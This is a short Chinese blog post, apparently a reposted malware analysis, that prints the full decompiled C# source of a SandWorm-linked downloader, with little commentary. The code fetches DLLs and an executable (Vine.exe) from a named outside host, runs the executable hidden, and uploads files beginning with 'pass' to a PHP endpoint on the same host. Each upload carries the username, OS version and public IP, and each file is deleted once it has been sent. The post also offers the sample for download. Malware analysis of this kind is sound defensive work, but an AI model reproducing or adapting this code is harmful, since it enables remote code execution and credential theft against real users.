Virus_C#_SampleAnalysis

来源：互联网发布：mysql进程意外终止编辑：程序博客网时间：2024/06/03 22:21

0x1 背景

这几天在做一些小结,除了二进制,也对其他的做点记录,本篇讲C#样本的简单分析.

前几天启明有篇文章讲到了SandWorm样本,漏洞部分也没分析,就跟着文章的描述简单的过了一遍,下载到文章中提到的Down样本.用PEId查壳是 Microsoft Visual C# / Basic .NET,快速的做了分析.

0x2 主角登场

本来该是样本的,但个人感觉dnSpy更牛逼闪闪,话不多说，上图：
dnSpy

注:项目右键:1可以Debug,2可以保存为本地项目(见附件)ILSpy也可以吧,喜欢的还是他俩.

2.1样本分析

using System;using System.Collections.Generic;using System.Diagnostics;using System.IO;using System.Net.Http;using System.Threading.Tasks;namespace DownloadAndExecute{    internal class Program    {        private static readonly HttpClient client = new HttpClient();        private static bool success = false;        private static int exitCode = 1;        private static void Main(string[] args)        {            Program.DownloadFiles().Wait();            if (Program.success)            {                using (Process process = Process.Start(new ProcessStartInfo                {                    FileName = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe"),                    WindowStyle = ProcessWindowStyle.Hidden,                    WorkingDirectory = Path.GetDirectoryName(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe")),                    CreateNoWindow = true                }))                {                    process.WaitForExit();                    Program.exitCode = process.ExitCode;                }            }            if (Program.exitCode == 0)            {                Program.UploadFiles().Wait();            }        }        private static async Task UploadFiles()        {            try            {                int num;                FileInfo[] array;                int num2;                if (num > 2)                {                    FileInfo[] files = new DirectoryInfo(Path.Combine(new string[]                    {                        Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)                    })).GetFiles();                    array = files;                    num2 = 0;                    goto IL_28A;                }                IL_70:                FileInfo fileInfo;                try                {                    string value = File.ReadAllText(fileInfo.FullName);                    string value2 = await Program.GetExternalIPAddress();                    FormUrlEncodedContent content = new FormUrlEncodedContent(new Dictionary<string, string>                    {                        {                            "data",                            "data"                        },                        {                            "username",                            Environment.UserName                        },                        {                            "os_version",                            Environment.OSVersion.VersionString                        },                        {                            "file_path",                            fileInfo.Name                        },                        {                            "public_ip",                            value2                        },                        {                            "file_content",                            value                        }                    });                    if (await(await Program.client.PostAsync("http://www.ictcoe.org.et/plugins/system/legacy/core.php", content)).Content.ReadAsStringAsync() == fileInfo.Name)                    {                        fileInfo.Delete();                    }                    value = null;                }                catch (Exception)                {                }                IL_275:                fileInfo = null;                num2++;                IL_28A:                if (num2 >= array.Length)                {                    array = null;                }                else                {                    fileInfo = array[num2];                    if (fileInfo.Name.StartsWith("pass"))                    {                        goto IL_70;                    }                    goto IL_275;                }            }            catch (Exception)            {            }        }        private static async Task<string> GetExternalIPAddress()        {            string result;            try            {                result = (await(await Program.client.GetAsync("http://checkip.dyndns.org")).Content.ReadAsStringAsync()).Split(new char[]                {                    ':'                })[1].Substring(1).Split(new char[]                {                    '<'                })[0];            }            catch (Exception)            {                result = "";            }            return result;        }        private static async Task DownloadFiles()        {            try            {                string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Newtonsoft.Json.dll");                FileInfo fileInfo = new FileInfo(text);                if (!fileInfo.Exists)                {                    byte[] buffer = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/Newtonsoft.Json.dll")).Content.ReadAsByteArrayAsync();                    BinaryWriter expr_144 = new BinaryWriter(new FileStream(text, FileMode.Create));                    expr_144.Write(buffer);                    expr_144.Close();                }                fileInfo = new FileInfo(text);                Console.WriteLine("Newton soft json dll length is: " + fileInfo.Length);                string text2 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "System.Data.SQLite.DLL");                FileInfo fileInfo2 = new FileInfo(text2);                if (!fileInfo2.Exists)                {                    byte[] var_7_27E = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/System.Data.SQLite.DLL")).Content.ReadAsByteArrayAsync();                    BinaryWriter expr_291 = new BinaryWriter(new FileStream(text2, FileMode.Create));                    expr_291.Write(var_7_27E);                    expr_291.Close();                }                fileInfo2 = new FileInfo(text2);                Console.WriteLine("Sqlite dll length is: " + fileInfo2.Length);                string text3 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe");                FileInfo fileInfo3 = new FileInfo(text3);                if (!fileInfo3.Exists)                {                    byte[] var_8_3CB = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/Vine.exe")).Content.ReadAsByteArrayAsync();                    BinaryWriter expr_3DE = new BinaryWriter(new FileStream(text3, FileMode.Create));                    expr_3DE.Write(var_8_3CB);                    expr_3DE.Close();                }                fileInfo3 = new FileInfo(text3);                Console.WriteLine("Vine exe length is: " + fileInfo3.Length);                Program.success = true;                text = null;                text2 = null;                text3 = null;            }            catch (Exception)            {            }        }    }}

0x3 Sample

Sample-请确认样本只用于测试才下载,其他的我可不负-密码国际惯例

0x4 参考文章

“沙虫”二代来袭，office全线沦陷！

阅读全文

0 0